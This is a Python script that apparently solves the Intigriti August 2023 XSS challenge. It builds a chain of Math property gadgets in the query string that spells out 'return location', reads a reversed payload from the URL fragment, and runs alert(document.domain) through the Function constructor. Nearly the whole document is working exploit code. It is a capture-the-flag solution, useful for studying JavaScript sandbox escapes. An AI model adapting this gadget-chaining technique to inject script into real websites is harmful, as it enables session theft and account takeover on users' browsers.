|
BASE_URL = "https://challenge-0823.intigriti.io/challenge/index.html" |
|
XSS_PAYLOAD = "alert(document.domain)" |
|
|
|
|
|
def make_zero() -> list[str]: |
|
return [ |
|
"Math.E.valueOf", |
|
"Math.sign", |
|
"Math.log", |
|
] |
|
|
|
|
|
def make_one() -> list[str]: |
|
return [ |
|
"Math.E.valueOf", |
|
"Math.sign", |
|
] |
|
|
|
|
|
def clear_seeds() -> list[str]: |
|
return make_zero() + [ |
|
"Math.seeds.splice", |
|
] |
|
|
|
|
|
char_to_list = {} |
|
|
|
char_to_list["a"] = make_one() + [ |
|
"Math.max.name.at", |
|
] |
|
char_to_list["c"] = make_one() + [ |
|
"Math.acos.name.at", |
|
] |
|
char_to_list["d"] = make_zero() + [ |
|
"Math.constructor.defineProperty.name.at", |
|
] |
|
char_to_list["e"] = make_one() + [ |
|
"Math.ceil.name.at", |
|
] |
|
char_to_list["g"] = make_zero() + [ |
|
"Math.constructor.getPrototypeOf.name.at", |
|
] |
|
char_to_list["h"] = make_zero() + [ |
|
"Math.hypot.name.at", |
|
] |
|
char_to_list["i"] = make_one() + [ |
|
"Math.sin.name.at", |
|
] |
|
char_to_list["l"] = make_one() + [ |
|
"Math.floor.name.at", |
|
] |
|
char_to_list["m"] = make_zero() + [ |
|
"Math.min.name.at", |
|
] |
|
char_to_list["n"] = make_one() + [ |
|
"Math.constructor.entries.name.at", |
|
] |
|
char_to_list["o"] = make_one() + [ |
|
"Math.round.name.at", |
|
] |
|
char_to_list["q"] = make_one() + [ |
|
"Math.sqrt.name.at", |
|
] |
|
char_to_list["r"] = make_one() + [ |
|
"Math.trunc.name.at", |
|
] |
|
char_to_list["s"] = make_zero() + [ |
|
"Math.sin.name.at", |
|
] |
|
char_to_list["t"] = make_one() + [ |
|
"Math.atan.name.at", |
|
] |
|
char_to_list["u"] = make_one() + [ |
|
"Math.random.name.sub.name.at", |
|
] |
|
char_to_list["v"] = make_zero() + [ |
|
"Math.constructor.values.name.at", |
|
] |
|
char_to_list["\t"] = [ |
|
"Math.random.name.normalize.name.length.valueOf", |
|
"Math.random.name.constructor.fromCharCode", |
|
] |
|
char_to_list["\n"] = [ |
|
"Math.random.name.replaceAll.name.length.valueOf", |
|
"Math.random.name.constructor.fromCharCode", |
|
] |
|
|
|
|
|
qs = [] |
|
|
|
qs += clear_seeds() |
|
# Math.seeds === [] |
|
|
|
func_body = "return\tlocation" |
|
for c in func_body: |
|
qs += char_to_list[c] |
|
qs += ["Math.seeds.push"] |
|
# Math.seeds === ["r", "e", "t", ..., "n"] |
|
|
|
qs += ["Math.random.name.valueOf"] |
|
qs += ["Math.seeds.join"] |
|
# -> "return\tlocation" |
|
|
|
qs += [ |
|
"Math.random.constructor", |
|
"Math.seeds.reduce", |
|
] |
|
# -> Function("return\tlocation") |
|
|
|
qs += [ |
|
"Math.constructor.values", |
|
"Math.seeds.sort.apply", |
|
"Math.seeds.reverse.apply", |
|
"Math.seeds.join.bind", |
|
"Math.seeds.unshift", |
|
] |
|
# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse())), "r", "e", "t", ..., "n"] |
|
|
|
qs += make_one() |
|
qs += ["Math.seeds.splice"] |
|
# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse()))] |
|
|
|
qs += [ |
|
"Math.random.name.valueOf", |
|
"Math.seeds.unshift", |
|
"Math.random.name.valueOf", |
|
"Math.seeds.unshift", |
|
] |
|
# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse()))] |
|
|
|
qs += [ |
|
"Math.seeds.pop", |
|
"Math.seeds.reduce", |
|
] |
|
# -> Object.values(location).sort().reverse().join("", "") |
|
# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse()))] |
|
|
|
qs += [ |
|
"Math.seeds.constructor.from", |
|
"Math.seeds.reverse.apply", |
|
"Math.seeds.join.bind", |
|
"Math.seeds.reduce", |
|
] |
|
# -> "alert(document.domain)//#..." |
|
|
|
qs += [ |
|
"Math.random.constructor", |
|
"Math.seeds.reduce", |
|
] |
|
# -> Function("alert(document.domain)//#...")("", "") |
|
|
|
assert len(qs) < 100, len(qs) |
|
|
|
print(f'{BASE_URL}?q={",".join(qs)}#{"".join(reversed(XSS_PAYLOAD + "//"))}') |
|
# If you access this URL, `alert(document.domain)` will be executed. |